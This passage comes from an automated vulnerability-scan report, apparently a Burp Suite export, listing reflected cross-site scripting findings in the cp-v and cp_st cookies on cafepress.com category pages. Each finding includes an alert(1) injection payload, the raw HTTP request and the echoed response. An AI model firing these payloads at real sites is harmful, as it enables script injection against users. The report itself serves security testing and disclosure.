<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'c2b6f</script><script>alert(1)</script>6386f2e7ab'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.72. http://www.cafepress.com/+womens-tank-tops [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+womens-tank-tops

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec3ed"-alert(1)-"6cdf0b2af4a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 61745
Date: Sun, 26 Dec 2010 13:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.73. http://www.cafepress.com/+womens-tank-tops [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+womens-tank-tops

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae66d</script><script>alert(1)</script>eabb41eb2b2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ae66d</script><script>alert(1)</script>eabb41eb2b2; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59702
Date: Sun, 26 Dec 2010 13:46:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'ae66d</script><script>alert(1)</script>eabb41eb2b2'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.74. http://www.cafepress.com/+womens-thongs [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+womens-thongs

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d1e3"-alert(1)-"b1f51daa56d was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 59312
Date: Sun, 26 Dec 2010 13:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.75. http://www.cafepress.com/+womens-thongs [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+womens-thongs

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b983</script><script>alert(1)</script>ebe8ab7f2c6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=5b983</script><script>alert(1)</script>ebe8ab7f2c6; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59334
Date: Sun, 26 Dec 2010 13:47:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/
Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '5b983</script><script>alert(1)</script>ebe8ab7f2c6'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.76. http://www.cafepress.com/+yoga-mats [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+yoga-mats

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa7a8"-alert(1)-"e7fc2e4ad80 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+yoga-mats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59513
Date: Sun, 26 Dec 2010 13:49:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/
Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.77. http://www.cafepress.com/+yoga-mats [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+yoga-mats

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f3e8</script><script>alert(1)</script>edf8d16990b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+yoga-mats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4f3e8</script><script>alert(1)</script>edf8d16990b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 